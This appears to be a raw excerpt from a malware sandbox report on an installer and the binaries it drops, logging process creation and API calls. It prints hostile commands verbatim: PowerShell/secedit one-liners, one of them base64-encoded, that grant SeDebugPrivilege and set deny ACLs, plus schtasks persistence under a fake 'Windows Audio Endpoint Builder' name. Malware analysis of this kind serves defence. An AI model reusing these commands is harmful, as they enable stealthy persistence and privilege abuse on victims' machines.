Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.')) -force;"
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.')) -force;"
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "[io.file]::writeallbytes([io.path]::combine($env:temp, 'sedebugprivilege4.inf'), [convert]::frombase64string('//5bafuabgbpagmabwbkaguaxqanaaoavqbuagkaywbvagqazqa9ahkazqbzaa0acgbbafyazqbyahmaaqbvag4axqanaaoacwbpagcabgbhahqadqbyaguapqaiacqaqwbiaekaqwbbaecatwakaciadqakafiazqb2agkacwbpag8abga9adeadqakafsauabyagkadgbpagwazqbnaguaiabsagkazwboahqacwbdaa0acgbtaguarablagiadqbnafaacgbpahyaaqbsaguazwblacaapqagacoauwatadealqa1ac0amqa4aa0acga=')); secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege4.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege4.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege4.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege4.*')) -force;"
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.')) -force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege4.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege4.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege4.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege1.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege1.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege3.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege3.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege1.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege1.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege1.log /quiet
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.')) -force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.')) -force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "[io.file]::writeallbytes([io.path]::combine($env:temp, 'sedebugprivilege4.inf'), [convert]::frombase64string('//5bafuabgbpagmabwbkaguaxqanaaoavqbuagkaywbvagqazqa9ahkazqbzaa0acgbbafyazqbyahmaaqbvag4axqanaaoacwbpagcabgbhahqadqbyaguapqaiacqaqwbiaekaqwbbaecatwakaciadqakafiazqb2agkacwbpag8abga9adeadqakafsauabyagkadgbpagwazqbnaguaiabsagkazwboahqacwbdaa0acgbtaguarablagiadqbnafaacgbpahyaaqbsaguazwblacaapqagacoauwatadealqa1ac0amqa4aa0acga=')); secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege4.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege4.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege4.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege4.*')) -force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege4.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege4.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege4.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege1.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege1.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege3.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege3.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege3.log /quiet
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.')) -force;"	Jump to behavior
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.')) -force;"
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.')) -force;"
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "[io.file]::writeallbytes([io.path]::combine($env:temp, 'sedebugprivilege4.inf'), [convert]::frombase64string('//5bafuabgbpagmabwbkaguaxqanaaoavqbuagkaywbvagqazqa9ahkazqbzaa0acgbbafyazqbyahmaaqbvag4axqanaaoacwbpagcabgbhahqadqbyaguapqaiacqaqwbiaekaqwbbaecatwakaciadqakafiazqb2agkacwbpag8abga9adeadqakafsauabyagkadgbpagwazqbnaguaiabsagkazwboahqacwbdaa0acgbtaguarablagiadqbnafaacgbpahyaaqbsaguazwblacaapqagacoauwatadealqa1ac0amqa4aa0acga=')); secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege4.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege4.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege4.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege4.*')) -force;"
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.')) -force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege1.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege1.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege3.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege3.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege4.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege4.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege4.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege1.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege1.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege1.log /quiet
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.')) -force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.')) -force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "[io.file]::writeallbytes([io.path]::combine($env:temp, 'sedebugprivilege4.inf'), [convert]::frombase64string('//5bafuabgbpagmabwbkaguaxqanaaoavqbuagkaywbvagqazqa9ahkazqbzaa0acgbbafyazqbyahmaaqbvag4axqanaaoacwbpagcabgbhahqadqbyaguapqaiacqaqwbiaekaqwbbaecatwakaciadqakafiazqb2agkacwbpag8abga9adeadqakafsauabyagkadgbpagwazqbnaguaiabsagkazwboahqacwbdaa0acgbtaguarablagiadqbnafaacgbpahyaaqbsaguazwblacaapqagacoauwatadealqa1ac0amqa4aa0acga=')); secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege4.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege4.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege4.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege4.*')) -force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege1.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege1.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege3.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege3.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "c:\windows\system32\secedit.exe" /configure /db c:\users\user\appdata\local\temp\sedebugprivilege4.sdb /cfg c:\users\user\appdata\local\temp\sedebugprivilege4.inf /overwrite /log c:\users\user\appdata\local\temp\sedebugprivilege4.log /quiet

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	2_2_0000000180037058
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: _getptd,GetLocaleInfoA,	2_2_000000018003715C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: GetLocaleInfoA,	2_2_0000000180037244
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,	2_2_00000001800372F8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: GetLocaleInfoA,	2_2_000000018003D408
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: GetLocaleInfoW,	2_2_000000018003A528
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,free,GetLocaleInfoA,	2_2_000000018003A584
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: _getptd,GetLocaleInfoA,	2_2_000000018003758C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: EnumSystemLocalesA,	2_2_000000018003769C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: EnumSystemLocalesA,	2_2_0000000180037730
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,	2_2_000000018003779C
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: EnumSystemLocalesW,	30_2_00350E38
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetLocaleInfoW,	30_2_0035A219
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: EnumSystemLocalesW,	30_2_00359E55
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetLocaleInfoW,	30_2_0035A448
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: EnumSystemLocalesW,	30_2_00359EA0
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: EnumSystemLocalesW,	30_2_00359F3B
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	30_2_0035A517
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetLocaleInfoW,	30_2_0035135E
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	30_2_0035A342
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	30_2_00359BB3
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetLocaleInfoW,	30_2_00359DAE
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	30_2_00359FC6

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
